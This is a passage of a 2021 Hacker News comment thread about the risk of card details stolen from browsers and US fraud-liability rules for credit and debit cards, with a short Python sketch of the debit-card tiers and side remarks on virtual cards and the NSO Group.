| gets used. They are also easily replaced, so i think many
| wouldn't go as far as you are.
|
| Debit cards are weirder in their liability (and are extracting
| money from your bank account, which is harder to get back).
|
| If you report them lost/stolen before someone uses them, it's
| 0 bucks. Within 2 days of learning about it, it's 50 bucks.
| More than 2 days but less than 60, it's 500 bucks. More than
| 60 days - unlimited liability.
|
| So i'd be a lot more careful with debit cards, at least in the
| US.
|
| (You are never liable on either for unauthorized transactions
| when your card is _not_ lost/stolen, as long as you report
| them within 60 days.)
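
The debit-card tiers above translate directly into code - a sketch
of the EFTA schedule exactly as stated in the comment (not legal
advice; the function name is made up):

```python
def debit_fraud_liability(reported_before_use: bool, days_to_report: int):
    """Maximum dollar liability for a lost/stolen debit card; None = unlimited."""
    if reported_before_use:
        return 0          # reported before anyone used it
    if days_to_report <= 2:
        return 50         # within 2 days of learning about the loss
    if days_to_report <= 60:
        return 500        # more than 2 days, up to 60
    return None           # more than 60 days: unlimited liability
```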
| r3trohack3r wrote:
| Hmm. I understood this to be different, but realizing now I
| don't have sources for where I learned this:
|
| * Bank accounts, savings accounts, brokerage accounts, etc.
| are all unlimited liability
|
| * Lines of credit are all zero liability
|
| I've used this as a rule of thumb for many years, and was the
| initial reason for me switching to 100% credit cards for
| transactions.
| DannyBee wrote:
| Yeah, I'm telling you based on what the statutes say (the
| FCBA covers credit cards, the EFTA covers debit)
|
| A short version of it is here:
| https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-
| cr...
| brianwawok wrote:
| I would never ever use a debit card outside of the ATM of the
| bank I belong to.
|
| Credit card? Go wild, use it everywhere.
| dhosek wrote:
| What I like about the Mac implementation of storing credit
| cards is that it requires using touch ID to autofill the credit
| card info. There's no autofill without explicit user
| interaction.
| jetrink wrote:
| Credit cards are insecure by design and worrying about having
| them stolen from your browser or vault is not worth it in my
| opinion. You're far more likely to have it compromised from the
| retailer side no matter how careful you are. Also, it's easy to
| set up a notification on your phone for every time a card is
| used, so you can report fraud before any harm is done.
| prower wrote:
| Some online banks (don't know how widespread this is) allow
| you to create "virtual cards" that expire either after 1
| purchase or at a specific date (and with a set maximum
| budget). I use them for every single purchase I make online,
| it's inconvenient, but at least I've never entered my real
| card info anywhere.
| brianwawok wrote:
| That sounds like a lot of work. At least in the US you are
| not responsible for fraud. (I think the law may have like a
| $50 liability thing, but Visa/MC waive). So it's better to
| just not do this, and every 3-4 years when my CC is stolen,
| call them up - dispute the charges, get a new number. Takes
| < 5 minutes and I keep going.
|
| For what it's worth, the 2 times my number got stolen in
| the last 6 years, one was from a rogue agent at a hotel in
| Chicago, and one was from a bad website that stored credit
| cards.
| trepatudo wrote:
| In Portugal, you basically open the app, scan your
| fingerprint to give permission, and get a new card.
|
| You can even scan the card via webcam or copy the details
| to clipboard.
|
| The virtual card also limits itself either to single
| transaction or single store so it can't be used even if
| compromised on store level.
|
| It's a pretty simple process (<30 sec) and it's really
| useful.
| hggythhdtr wrote:
| > That sounds like a lot of work.
|
| My bank has a browser plugin that can create virtual
| cards with just a few clicks.
|
| > dispute the charges, get a new number. Takes < 5
| minutes and I keep going.
|
| This isn't the case for me, it would take me quite a bit
| of time over a period of several weeks to update all of
| the places i use my card if I were using the same number
| everywhere and it was compromised. I handle a lot of
| billing. I've had cards compromised at least three times
| in the past and it's very unpleasant. (for me)
| nIHOPp6MQw0f5ut wrote:
| Privacy (dot) com offers that as a service and you can use
| their extension to generate a card without leaving the
| page.
| bastardoperator wrote:
| Exactly this. I just assume my credit card will be stolen or
| leaked. Nearly every credit card has zero-liability
| protection too, so there is no use in worrying; this is why I
| use credit cards.
| TheFreim wrote:
| Liability and protection provided by credit cards is one of
| the reasons some people suggest using them and never using
| a debit card. Easier to get money back if it gets stolen
| from a credit card (assuming some YouTube video I saw was
| accurate).
| kristianp wrote:
| I definitely want to avoid having my credit card details
| stolen. The inconvenience of calling the bank to report
| fraudulent transactions and then waiting a few weeks for a
| replacement card to arrive is something to avoid if you value
| your time.
|
| I save most passwords in the browser, including discord, but
| not important things like banks and emails. Password manager
| for that. I think it's foolish of Chrome to offer to save CC
| details.
| njharman wrote:
| I use a CC for everything. I shop tons online, on multiple
| sites. I store my CC in the browser and share that across
| desktop, laptop, iPad and phones.
|
| In the last 10 years I've had one incident where the CC
| company did not automatically deny fraud. Two purchases, both
| refunded to me.
| williamdclt wrote:
| I've been thinking I should probably just memorise my card
| number. It would take a bit of effort, but can't be much
| harder than memorising a phone number, and it's possibly
| faster than entering my master password to unlock my password
| manager.
| the_only_law wrote:
| I've done it a number of times without even trying. Problem
| is if you have to replace it a lot.
| dbrgn wrote:
| I've memorized my last 2 credit card numbers. Takes about
| 5-10 minutes and is absolutely worth it!
| null_deref wrote:
| Oh at last, I can feel slightly less ashamed of being part of the
| Israeli technology scene.
| fortran77 wrote:
| All of Israel are responsible for one another ["kol Yisrael
| arevim zeh lazeh"]
| null_deref wrote:
| I fully believe in this statement, and let me assure you I'm
| proud to be Israeli. But, when NSO articles pop like
| mushrooms after rain, I feel sad for a period of time (a
| feeling I also encounter when I read about Israeli internet
| gambling companies).
| goodpoint wrote:
| This is why I use packages from a Linux distribution -
| specifically Debian.
| snapetom wrote:
| I've never heard of these libraries. Anyone know what they did?
___________________________________________________________________
(page generated 2021-08-03 23:00 UTC)